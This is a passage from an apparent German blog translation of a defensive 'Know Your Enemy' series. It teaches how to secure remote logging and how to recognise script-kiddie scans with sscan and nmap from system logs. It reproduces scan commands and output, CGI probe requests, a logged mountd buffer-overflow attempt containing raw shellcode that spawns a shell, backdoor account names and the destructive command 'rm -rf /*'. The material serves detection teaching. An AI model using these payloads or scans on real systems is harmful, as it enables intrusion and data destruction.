suchen und diese dann angreifen. Der dritte Teil beschreibt, was “Script
Kiddies” tun, wenn sie erst mal root sind und hier besonders, wie sie ihre
Spuren verwischen und was sie tun. Dieser Teil beschäftigt sich mit dem
Verfolgen ihrer Spuren. Genau wie beim Militär möchte man die Bösen verfolgen
und wissen was sie tun. Wir werden erklären, was man mit Hilfe der System Logs
herausfinden kann und was nicht. Vielleicht kannst du herausfinden, ob du
gescannt worden bist, nach was du gescannt worden bist, mit welchen Tools und ob
sie erfolgreich waren. Die Beispiele hier konzentrieren sich auf Linux, können
aber auf fast jede Version von Unix angewandt werden. Sei dir aber bewußt, daß
es keinen garatierten Weg gibt, jeden Schritt deines Feindes zu verfolgen.
Trotzdem ist dieser Artikel ein guter Anfang.

Deine Logs sichern

Dieser Artikel beschäftigt sich nicht mit der Erkennung von Einbruchsversuchen,
es gibt eine Anzahl exzellenter Quellen, die dies tun. Wenn du dich dafür
interessierst, empfehle ich Programme wie den Network Flight Recorder
(http://www.nfr.net) oder snort (http://www.clark.net/~roesch/security.html).
Dieser Artikel ist über Informationsbeschaffung. Im speziellen: wie finde ich
mit Hilfe meiner Systemlogs heraus, was der Feind tut? Du wirst überrascht sein,
wieviel Informationen man in seinen Logfiles findet. Bevor wir aber über die
Auswertung reden, müssen wir erst über die Sicherung der Logs reden. Deine
Logfiles sind wertlos, wenn du dich nicht auf ihre Richtigkeit verlassen kannst.
Das erste was die meisten Bösen tun, ist die Logfiles auf einem kompromittiertem
System zu verändern. Es gibt eine ganze Reihe von Tools (z.B. cloak), die deine
Anwesenheit aus den Logs herauslöschen oder gleich das ganze Logging verändern
(wie veränderte syslogd-Binaries). Der erste Schritt zum Auswerten der Logs muß
also deren Sicherung sein.

Das bedeutet, das Du einen Remote-Logserver verwenden mußt. Egal wie sicher Dein
System ist, Du kannst Logs auf einem kompromittiertem System nicht vertrauen.
Der Böse kann einfach ein rm -rf /* machen und deine Festplatte komplett
löschen. Dadurch wird das Wiederherstellen deiner Logs etwas schwierig. Um sich
dagegen zu schützen, sollten alle Systeme doppelt loggen: einmal lokal und
einmal auf einem Remote-Logserver. Ich würde empfehlen, eine eigene Maschine als
Logserver abzustellen, d.h. dieser Rechner tut nichts anderes, als die Logs von
anderen Systemen zu sammeln. Wenn Geld eine Rolle spielt, läßt sich mit Linux
einfach ein solcher Server aufsetzen. Dieser Server sollte bestmöglich gesichert
werden, mit so wenig laufenden Diensten wie möglich und Zugriff nur von der
Konsole aus. Außerdem sollte sichergestellt sein, daß der UDP-Port 514 geblockt
oder von einer Firewall an der Internetverbindung gesichert ist. Das schützt den
Server vor falschen oder nicht autorisierten Logginginformationen aus dem
Internet.

Wenn man ganz gerissen sein will, kompiliert man einfach neu, so das sie eine
andere Konfigurationsdatei einliest, z.B. /var/tmp/.conf. Auf diese Weise weiß
der Böse nicht, wo die wahre Konfigurationsdatei liegt. Die Änderung ist durch
einfaches editieren des Eintrags /etc/syslog.conf im Sourcecode zu machen.
Außerdme tragen wir in unsere neue Konfigurationsdatei ein, sowohl lokal als
auch auf dem Remote-Logserver zu loggen. Trotz alledem sollte man eine
Standardkonfigurationsdatei /etc/syslogd.conf behalten, auf der das Logging
ausschließlich lokal zu sein scheint. Diese Datei ist zwar jetzt nutzlos, wird
den Bösen aber von dem Remote-Logging ablenken. Eine andere Methode deine
Systeme zu schützen, ist das verwenden einer sicheren Logmethode. Eine
Möglichkeit wäre es, die syslogd-Binary gegen etwas auszutauschen, was einen
eingebauten Integritätscheck und eine größere Auswahl an Optionen hat, z.B.
syslog-ng, zu finden auf http://www.balabit.hu/products/syslog-ng.html.

Die meisten Logs die wir nutzen werden, liegen auf einem Remote-Logserver. Wie
vorher erwähnt, können wir auf die Integrität dieser Dateien vertrauen, da sie
auf einem Remote und gut gesichertem System liegen. Darüberhinaus ist wesentlich
leichter, bestimmte Muster in den Logs zu erkennen, da alle Systeme auf einen
zentralen Rechner schreiben. Man kann mit einem Blick sehen, was auf allen
Systemen geschieht. Die einzige Gelegenheit, bei der man die lokalen Logfiles
ansehen muß, ist um zu vergleichen, ob sie mit den Serverlogs identisch sind. So
läßt sich einfach herausfinden, ob sie verändert worden sind oder nicht.

Muster erkennen
===============

Ob man Opfer eines Portscans geworden ist, läßt sich normalerweise an den Logs
feststellen. Die meisten Script Kiddies scannen Netzwerke nach einer einzelnen
Schwäche. Wenn man aus den Logs erkennen kann, das die meisten eigenen Systeme
eine Verbindung auf dem immer gleichen Port zu einem immer gleichen Remotesystem
aufgebaut haben, ist das sehr wahrscheinlich eine Scanattacke. Der Feind hat die
Möglickeit, eine einzelne Schwachstelle auszunutzen und danach sucht er dein
Netzwerk ab. Wenn er sie findet, wird er sie ausnutzen. Auf den meisten
Linuxsystemen sind standardmäßig TCP-Wrapper installiert. Die meisten der
Verbindungen werden wir also in /var/log/secure finden. Bei den anderen Linux-
Varianten können wir alle inetd Verbindungen loggen indem inetd mit dem “-t”
Parameter gestartet wird. Ein typischer Schwachpunkt-Scan würde so ähnlich
aussehen wie das Beispiel weiter unten. Hier sucht jemand nach der wu-ftpd
Schwäche:

/var/log/secure
Apr 10 13:43:48 mozart in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:51 bach in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:54 hadyen in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:57 vivaldi in.ftpd[6613]: connect from 192.168.11.200
Apr 10 13:43:58 brahms in.ftpd[6613]: connect from 192.168.11.200

Man sieht, wie die Adresse 192.168.11.200 das Netzwerk absucht. Beachte, wie der
Angreifer die IPs nacheinander absucht (das ist nicht immer der Fall). Hier
liegt der Vorteil eines Logservers: man kann einfacher Muster im Netzwerk
erkennen, da alle Logs hier zusammenlaufen. Die wiederholten Verbindungen zu
Port 21 (ftp) zeigen an, das wahrscheinlich nach dem wu-ftpd Schwachpunkt
gesucht wurde. Wir haben also gerade herausgefunden, wonach der Böse gesucht
hat. Scans tendieren oft dazu in Wellen zu kommen. Jemand veröffentlicht Code,
um eine imap-Schwäche auszunutzen und plötzlich kommt ein Schwall von imap-Scans
in die Logs. Nächsten Monat ist es dann vielleicht ftp. Eine hervorragende
Quelle für aktuelle Schwachpunkte ist http://www.cert.org/advisories. Manche
Tools können auch gleichzeitig nach mehreren Schwächen suchen, man sieht also
manchmal eine einzelne Quelle Verbindung zu mehreren Ports aufnehmen.

Was sind die Tools?

Manchmal kann sogar die Tools erkennen, die benutzt werden, um das Netzwerk zu
scannen. Einige der einfacheren Tools scannen nach nur einem Schwachpunkt, wie
z.B. ftp-scan.c. Wenn nur ein einzelner Port oder Schwachpunkt im Netzwerk
gescannt wird, wird wahrscheinlich ein solches “Einzeltool” benutzt. Es
existieren aber Tools, die nach einer ganzen Reihe von Schwachpunkten suchen.
Die beiden populärsten Tools sind sscan (http://www.ben2.ucla.edu/~jsbach) von
jsbach und nmap (http://www.insecure.org/nmap) von Fyodor. Ich habe diese beiden
Tools ausgesucht, da sie die beiden “Kategorien” von Scanningtools
repräsentieren. Ich empfehle sehr, da du diese Tools gegen dein Netzwerk
einsetzt, du könntest über die Ergebnisse überrascht sein

* sscan repräsentiert das Allzweck-Script Kiddie-Scanningtool und ist
wahrscheinlich eines der besten. Es     testet ein Netzwerk schnell auf eine
Reihe von Schwachstellen (inklusive cgi-bin). Es ist einfach anzupassen
und erlaubt so Testverfahren für neue Schwächen hinzuzufügen. Man muß dem
Tool nur ein Netzwerk und eine     Subnetzmaske geben und es erledigt den Rest.
Der Anwender muß jedoch root sein um es zu nutzen. Die Ausgabe     ist extrem
einfach zu deuten (darum ist es so beliebt). Es gibt eine knappe Zusammenfassung
vieler     verwundbarer Dienste. Alles, was man zu tun hat, ist sscan gegen ein
Netzwerk einzusetzen, die Ausgabe nach     dem Wort “VULN” zu durchsuchen und den
“Angriff des Tages” zu starten. Es folgt ein Beispiel, in dem sscan     gegen
das System mozart (172.17.6.30) eingesetzt wird:

otto #./sscan -o 172.17.6.30

————————–<[ * report for host mozart *
<[ tcp port: 80 (http) ]>       <[ tcp port: 23 (telnet) ]>
<[ tcp port: 143 (imap) ]>      <[ tcp port: 110 (pop-3) ]>
<[ tcp port: 111 (sunrpc) ]>    <[ tcp port: 79 (finger) ]>
<[ tcp port: 53 (domain) ]>     <[ tcp port: 25 (smtp) ]>
<[ tcp port: 21 (ftp) ]>
–<[ *OS*: mozart: os detected: redhat linux 5.1
mozart: VULN: linux box vulnerable to named overflow.
-<[ *CGI*: 172.17.6.30: tried to redirect a /cgi-bin/phf request.
-<[ *FINGER*: mozart: root: account exists.
--<[ *VULN*: mozart: sendmail will 'expn' accounts for us
--<[ *VULN*: mozart: linux bind/iquery remote buffer overflow
--<[ *VULN*: mozart: linux mountd remote buffer overflow
---------------------------<[ * scan of mozart completed *

* nmap steht für das "reine Daten" Tool. Es verrät nicht, welche
Schwachstellen existieren, sondern nur     welche Ports offen sind und du selber
schätzt den Einfluß auf die Sicherheit ab. Nmap ist schnell zur ersten     Wahl der
Portscanner geworden und das nicht ohne Grund. Es vereint die besten Funktionen
von verschiedenen     Portscannern in einem einzelnen Tool, inklusive OS-
Feststellung, verschiedene Paketzusammensetzungsoptionen     (original:packet
assembly options), sowohl TCP als auch UDP scanning, Willkürlichkeit, etc. Man
braucht     jedoch Netzwerkwissen um das Tool zu nutzen und die Daten zu
interpretieren. Es folgt ein Beispiel in dem     nmap wieder gegen das gleiche
System eingesetzt wird:

otto #nmap -sS -O 172.17.6.30

Starting nmap V. 2.08 by Fyodor (fyodor@dhp.com,
www.insecure.org/nmap/)
Interesting ports on mozart (172.17.6.30):
Port    State       Protocol Service
21      open        tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
53      open        tcp        domain
70      open        tcp        gopher
79      open        tcp        finger
80      open        tcp        http
109     open        tcp        pop-2
110     open        tcp        pop-3
111     open        tcp        sunrpc
143     open        tcp        imap2
513     open        tcp        login
514     open        tcp        shell
635     open        tcp        unknown
2049    open        tcp        nfs

TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
Remote operating system guess: Linux 2.0.35-36

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

Durch das Lesen deiner Logs kannst du erkennen, welches Tools gegen dich
eingesetzt wurde. Um das zu schaffen, mußt du wissen, wie diese Tools arbeiten.
Ein sscan wird wie folgt geloggt werden (dies ist ein Standardscan ohne
Veränderungen an irgendwelchen Konfigurationsdateien):

/var/log/secure
Apr 14 19:18:56 mozart in.telnetd[11634]: connect from 192.168.11.200
Apr 14 19:18:56 mozart imapd[11635]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.fingerd[11637]: connect from 192.168.11.200
Apr 14 19:18:56 mozart ipop3d[11638]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.telnetd[11639]: connect from 192.168.11.200
Apr 14 19:18:56 mozart in.ftpd[11640]: connect from 192.168.11.200
Apr 14 19:19:03 mozart ipop3d[11642]: connect from 192.168.11.200
Apr 14 19:19:03 mozart imapd[11643]: connect from 192.168.11.200
Apr 14 19:19:04 mozart in.fingerd[11646]: connect from 192.168.11.200
Apr 14 19:19:05 mozart in.fingerd[11648]: connect from 192.168.11.200

/var/log/maillog
Apr 14 21:01:58 mozart imapd[11667]: command stream end of file, while
reading line user=??? host=[192.168.11.200]
Apr 14 21:01:58 mozart ipop3d[11668]: No such file or directory while
reading line user=??? host=[192.168.11.200]
Apr 14 21:02:05 mozart sendmail[11675]: NOQUEUE: [192.168.11.200]: expn
root

/var/log/messages
Apr 14 21:03:09 mozart telnetd[11682]: ttloop: peer died: Invalid or
incomplete multibyte or wide character
Apr 14 21:03:12 mozart ftpd[11688]: FTP session closed

sscan sucht außerdem nach cgi-bin Schwächen. Diese Versuche werden nicht mit
syslogd aufgezeichnet, man findet sie statt dessen in access_log. Ich habe mich
trotzdem entschlossen, sie hier zu deiner Erbauung zu erwähnen

/var/log/httpd/access_log
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/phf
HTTP/1.0″ 302 192
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/Count.cgi
HTTP/1.0″ 404 170
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/test-cgi
HTTP/1.0″ 404 169
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/php.cgi
HTTP/1.0″ 404 168
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/handler
HTTP/1.0″ 404 168
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/webgais
HTTP/1.0″ 404 168
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/websendmail
HTTP/1.0″ 404 172
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/webdist.cgi
HTTP/1.0″ 404 172
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/faxsurvey
HTTP/1.0″ 404 170
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/htmlscript
HTTP/1.0″ 404 171
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-
bin/pfdisplay.cgi HTTP/1.0″ 404 174
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/perl.exe
HTTP/1.0″ 404 169
192.168.11.200 – - [14/Apr/1999:16:44:49 -0500] “GET /cgi-bin/wwwboard.pl
HTTP/1.0″ 404 172
192.168.11.200 – - [14/Apr/1999:16:44:50 -0500] “GET /cgi-
bin/ews/ews/architext_query.pl HTTP/1.0″ 404 187
192.168.11.200 – - [14/Apr/1999:16:44:50 -0500] “GET /cgi-bin/jj HTTP/1.0″
404 163

Beachte, wie eine vollständige Verbindung (SYN, SYN-ACK, ACK) für alle Ports
aufgebaut und dann wieder abgebrochen wird. Das kommt daher, daß sscan auf der
Anwendungsebene feststellt was vorgeht. sscan möchte nicht nur wissen OB ein ftp
port offen ist, sondern WELCHER ftp daemon läuft. Das gleiche trifft auch für
imap, pop etc. zu. Sehen kann das in den “sniff traces”, die mit sniffit, einem
weit verbreitetem Tools zum sniffen von Passwörtern, erzeugt wurden.

mozart $ cat 172.17.6.30.21-192.168.11.200.7238
220 mozart.example.net FTP server (Version wu-2.4.2-academ[BETA-17](1) Tue
Jun 9 10:43:14 EDT 1998) ready.

Wie man oben sehen kann, wurde eine vollständige Verbindung aufgebaut, um die
Version des laufenden wu-ftpd zu ermitteln. Wenn Verbindungen wie oben in den
Logs auftauchen, wird man sehr wahrscheinlich gescannt. Diese Tools bauen
Verbindungen auf, um festzustellen, was auf dem Rechner läuft.

nmap kümmert sich wie die meisten Portscanner nicht darum was läuft, sondern ob
spezielle Dienste laufen. Dafür hat nmap ein umfangreiches Set an Optionen, mit
denen man bestimmen kann, welche Art von Verbindung herzustellen ist, inklusive
SYN, FIN, Xmas, Null, etc. Eine detaillierte Beschreibung der Optionen findet
man auf http://www.insecure.org/nmap/nmap_doc.html. Wegen dieser Optionen werden
die Logs je nach ausgewählten Optionen anders aussehen. Eine Verbindung, die mit
den -sT Parametern aufgebaut wurde, ist eine vollständige Verbindung, die Logs
werden also ähnlich wie bei sscan aussehen, nmap scannt jedoch standardmäßig
mehr Ports.

/var/log/secure
Apr 14 21:20:50 mozart in.rlogind[11706]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.fingerd[11708]: connect from 192.168.11.200
Apr 14 21:20:51 mozart ipop2d[11709]: connect from 192.168.11.200
Apr 14 21:20:51 mozart in.rshd[11710]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: connect from 192.168.11.200
Apr 14 21:20:51 mozart gn[11711]: error: cannot execute /usr/sbin/gn: No
such file or directory
Apr 14 21:20:52 mozart in.timed[11712]: connect from 192.168.11.200
Apr 14 21:20:52 mozart imapd[11713]: connect from 192.168.11.200
Apr 14 21:20:52 mozart ipop3d[11714]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.telnetd[11715]: connect from 192.168.11.200
Apr 14 21:20:52 mozart in.ftpd[11716]: connect from 192.168.11.200

Etwas, an das man sich erinnern sollte, ist die -D (wie decoy=Lockvogel, Köder)
Option. Diese nmap Option ermöglicht es dem User seine Ip-Adresse zu verbergen.
Es ist möglich, das man Scans von 15 verschiedenen Quellen gleichzeitig sieht,
aber nur eine davon ist die echte. Es ist extrem schwierig, diese eine
herauszufinden. Noch öfter werden User die -sS Option zum Portscannen verwenden.
Da nur ein SYN-Paket gesendet wird, ist dieses eine noch verstohlerene Methode.
Wenn das Zielsystem antwortet, wird die Verbindung sofort mit einem RST
abgebrochen. Die Logs für einen solchen Scanversuch sehen wie folgt aus
(Anmerkung: nur die ersten fünf Einträge werden berücksichtigt):

/var/log/secure
Apr 14 21:25:08 mozart in.rshd[11717]: warning: can’t get client address:
Connection reset by peer
Apr 14 21:25:08 mozart in.rshd[11717]: connect from unknown
Apr 14 21:25:09 mozart in.timed[11718]: warning: can’t get client address:
Connection reset by peer
Apr 14 21:25:09 mozart in.timed[11718]: connect from unknown
Apr 14 21:25:09 mozart imapd[11719]: warning: can’t get client address:
Connection reset by peer
Apr 14 21:25:09 mozart imapd[11719]: connect from unknown
Apr 14 21:25:09 mozart ipop3d[11720]: warning: can’t get client address:
Connection reset by peer
Apr 14 21:25:09 mozart ipop3d[11720]: connect from unknown
Apr 14 21:25:09 mozart in.rlogind[11722]: warning: can’t get client
address: Connection reset by peer
Apr 14 21:25:09 mozart in.rlogind[11722]: connect from unknown

Beachte die ganzen Fehlermeldungen bei den Verbindungen. Da die SYN-ACK Sequenz
abgebrochen wird, bevor die Verbindung steht, kann der daemon das Quellsystem
nicht identifizieren. Die Logs sagen, das man gescannt worden ist, aber leider
nicht von wem. Noch alarmierender ist es, das auf den meisten anderen Systemen
(inklusive der neueren Linux-Kernelversionen) diese Fehler nicht mal geloggt
würden. Um Fyodor zu zitieren “…Dies ist eine Kuriosität von Linux 2.0.XX –
praktisch jedes andere System (inklusive der 2.2 und älteren 2.1 Kernel) zeigt
nichts an. Dieser Fehler (ein accept() wird gesendet bevor der 3-way-handshake
komplett ist) wurde beseitigt.”

nmap bietet noch andere Stealthoptionen, wie z.B. -sF, -sX, -sN bei denen
verschiedene Parameter genutzt werden. So sehen die Logs für diese Scans aus:

/var/log/secure

Beachte: keine Logeinträge. Erschreckend, oder? Man wurde gerade gescannt und
weiß es nicht mal. Alle drei Scans lieferten die gleichen Ergebnisse, man kann
jedoch nur den ersten Typ (-sT, komplette Verbindung) vollständig loggen. Um
diese “Stealthscans” zu entdecken, braucht man ein anderes Logprogramm wie
tcplogd oder ippl. Einige kommerzielle Firewalls erkennen und zeichnen alle
diese Scans auf (ich habe das auf einer Checkpoint Firewall-1 überprüft).

Sind sie reingekommen?

Wenn Du erkannt hast, das Du gescannt worden bist und wonach sie gesucht haben
ist die nächste große Frage “Sind sie reingekommen?”. Die meisten heutigen
“remote exploits” basieren auf Pufferüberläufen (buffer overflows, auch bekannt
als smashing the stack). Einfach formuliert findet ein Pufferüberlauf statt,
wenn ein Programm (normalerweise ein daemon) mehr Eingaben erhält, als er
erwartet hat und dadurch kritische Bereiche im Hauptspeicher überschreibt.
Bestimmter Code wird dann ausgeführt und gibt dem User normalerweise root-
Zugriff. Mehr Infos über buffer overflows findet man in Aleph1′s hervorragendem
Dokument auf ftp://ftp.technotronic.com/rfc/phrack49-14.txt.

Normalerweise erkennt man Buffer overflow-Attacken im /var/log/messages Logfile
(oder /var/adm/messages bei anderen Unixvarianten) für Angriffe gegen mountd.
Ähnliche Einträge findet man in maillog für Angriffe gegen den imapd. Eine
solche Attacke würde wie folgt aussehen:

Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client
192.168.11.200.
Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together
Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~
P~P~P3Û3À°^[Í~@3Ò3À~KÚ°^FÍ~@þÂuô1À°^BÍ~@~EÀubëb^V<ýt^FþÀt^Këõ°0þÈ~HFÿëì^°^B~
I^FþÈ~IF^D°^F~IF^H°f1ÛþÃ~IñÍ~@~I^F°^Bf~IF^L°*f~IF^N~MF^L~IF^D1À~IF^P°^P~IF^H°
fþÃÍ~@°^A~IF^D°f³^DÍ~@ë^DëLëR1À~IF^D~IF^H°fþÃÍ~@~HÃ°?1ÉÍ~@°?þÁÍ~@°?þÁÍ~@¸.bin@~
I^F¸.sh!@~IF^D1À~HF^G~Iv^H~IF^L°^K~Ió~MN^H~MV^LÍ~@1À°^A1ÛÍ~@èEÿÿÿÿýÿPrivet
ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51
mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^
E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E
^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E
^H(-^E^H(-^E

Wenn so etwas in den Logs auftaucht, hat jemand versucht, in das System
einzudringen. Es ist schwierig zu sagen, ob er erfolgreich war. Eine Methode
wäre es, nach dem Angriffsversuch nachzusehen, ob von dem Quellsystem eine
Verbindung zum eigenen System besteht. Wenn sie sich erfolgreich von außen
einloggen, haben sie Zugriff. Ein anderer Hinweis ist die Existenz von Accounts
wie “moof”, “rewt”, “crak0″ oder “w0rm” in /etc/passwd. Diese Accounts, mit der
uid0, werden von einigen der gebräuchlicheren Tools angelegt. Wenn der Böse erst
mal zugriff hat, wird er normalerweise als erstes die Logs säubern und das
Logging verändern (syslogd), mehr Informationen dazu finden sich im dritten
Teil. Von dann an wirst man keine zuverlässigen Logs mehr erhalten, da alles
kompromittiert ist. Was man als nächstes tut, ist Gegnstand eines anderen
Artikels. Bis dahin empfehle ich die Seite
http://www.cert.org/nav/recovering.html zu lesen.

Um mir beim Finden von Anomalien in meinen Logs zu helfen, habe ich folgende
Shellskripte (http://www.enteract.com/~lspitz/bash.txt bzw.
http://www.enteract.com/~lspitz/ksh.txt) geschrieben, die meine Logfiles
scannen. Für detailliertere Infos zum “greppen” und Sortieren von Logfiles liest
man am besten die Postings von Marcus Ranum hier nach:

http://www.nfr.net/firewall-wizards/mail-archive/1997/Sep/0098.html

Schlußfolgerung

Deine Systemlogs verraten Dir ein ganze Menge über den Feind. Der erste Schritt
muß jedoch die Sicherstellung der Integrität der Logs sein. Eine der besten
Methoden dazu ist die Verwendung eines zentralen Remote-Logservers der von allen
Systemen Logs empfängt und speichert. Einmal abgesichert, kann man Muster in den
Logs erkennen. Basierend auf diesen Mustern und Logeinträgen kann man erkennen
wonach der Böse sucht und welche Tools er wahrscheinlich verwendet. Aufbauend
auf diesem Wissen kann man seine Systeme besser schützen und sichern.

Geposted in Security Informations

Die Tools und Methoden der “Script Kiddies” – Teil 1

Mrz28
2008 Kommentieren Geschrieben von Daniel

Den Feind erkennen

Mein Kommandeur pflegte zu sagen, das man, um sich gegen den Feind zu schützen,
erst mal wissen muss, wer der Feind ist. Diese Militärdoktrin lässt sich genau so
auf die Welt der Netzwerksicherheit übertragen. Wie beim Militär geht es um
Ressourcen, die Du schützen willst. Um sie zu schützen, musst Du wissen, wer die
Gefahr ist und wie sie angreifen werden. Dieser Artikel, der erste von dreien,
tut genau das: er diskutiert die Tools und Methoden, die von einer der am
weitesten verbreiteten Gefahren genutzt werden: dem “Script Kiddie”. Der zweite
Teil konzentriert sich darauf, wie man diese Attacken erkennen kann, wie man
erkennt, welche Tools benutzt werden und nach welchen Schwachstellen sie suchen.
Der dritte Teil befasst sich damit, was passiert, wenn sie erst mal root geworden
sind und ganz besonders darauf, wie sie ihre Spuren verwischen und was sie als
nächstes tun.

Wer ist das “Script Kiddie”?

Das “Script Kiddie” ist jemand, der auf den schnellen, einfachen Erfolg aus ist.
Sie sind nicht auf der Suche nach spezieller Information oder zielen auf eine
bestimmte Firma. Alles was sie wollen, ist so einfach wie möglich root zu
werden. Das versuchen sie, indem sie sich auf eine kleine Anzahl von
Schwachpunkten beschränken und dann das gesamte Internet danach absuchen. Früher
oder später finden sie jemanden, der verwundbar ist.

Manche von ihnen sind fortgeschrittene Anwender, die ihre eigenen Tools
entwickeln und ausgeklügelte Hintertüren hinterlassen. Manche wissen überhaupt
nicht, was sie tun; das einzige was sie können, ist “go” auf der Kommandozeile
zu tippen. Ungeachtet ihres Wissensstandes haben sie alle die gleiche Strategie:
ziellos nach einer bestimmten Schwäche suchen und diese dann ausnutzen.

Die Bedrohung

Es ist diese zufällige Auswahl von Zielen, die das “Script Kiddie” so gefährlich
macht. Früher oder später werden Deine Maschinen und Netzwerke getestet werden,
man kann sich vor ihnen nicht verstecken. Ich kenne Admins, die erstaunt waren,
als ihre Systeme zwei Tage nach dem Hochfahren, als sie noch keiner kannte,
gescannt wurden. Das ist nicht weiter erstaunlich. Wahrscheinlich wurden ihre
Systeme von einem “Script Kiddie” gescannt, der gerade einen Netzwerkblock
testete.

Wenn sich das auf einige individuelle Scans beschränken würde, wäre die
Statistik auf deiner Seite. Mit Millionen Systemen im Internet ist es
wahrscheinlich, das niemand dich findet. Leider ist das nicht so. Die meisten
verwendeten Tools sind einfach zu benutzen und weit verbreitet, jeder kann sie
nutzen. Eine schnell wachsende Zahl von Leuten besorgt sich diese Tools. Da das
Internet keine geografischen Grenzen kennt, hat sich diese Bedrohung schnell um
die ganze Welt verbreitet. Auf einmal steht die Statistik gegen uns: mit so
vielen Anwendern die diese Tools nutzen ist die Frage nicht ob, sondern wann Du
gescannt werden wirst.

Dies ist ein hervorragendes Beispiel dafür, warum “Sicherheit durch
Geheimhaltung” versagen kann. Du glaubst vielleicht, das, wenn niemand dein
System kennt, Du sicher bist. Andere glauben, das ihre Systeme uninteressant
sind, warum sollte sie also jemand scannen? Nach genau diesen Systemen suchen
“Script Kiddies”, nach den ungeschützten Systemen, die einfach auszunutzen sind,
dem schnellen Erfolg.

Die Methoden

Die Methode des “Script Kiddies” ist einfach: durchsuche das Internet nach einer
bestimmten Schwachstelle und wenn du sie gefunden hast, nutze sie aus. Die
meisten Tools, die sie verwenden, sind automatisiert und erfordern wenig
Interaktion. Starte das Tool und komm ein paar Tage später wieder, um die
Ergebnisse abzuholen. Keine zwei Tools sind gleich, genauso wie keine zwei
Exploits (wie übersetzt man das am besten?) gleich sind. Wie auch immer, die
meisten Tools arbeiten nach dem gleichen Prinzip: zuerst wird eine IP-
Adressdatenbank erzeugt, die man scannen kann. Dann werden diese IP-Adressen
nach einer bestimmten Schwachstelle gescannt.

Nehmen wir einfach an, ein Anwender hätte ein Tool, mit dem er imap auf
Linuxsystemen ausnutzen kann
(http://www.enteract.com/~lspitz/imapd_exploit.txt). Als erstes würde er eine
IP-Adressdatenbank erzeugen, die gescannt werden können (d.h. das Zielsystem
läuft und ist erreichbar). Nachdem die Datenbank erzeugt ist, würde der Anwender
herausfinden wollen, welche dieser Systeme unter Linux laufen. Viele moderne
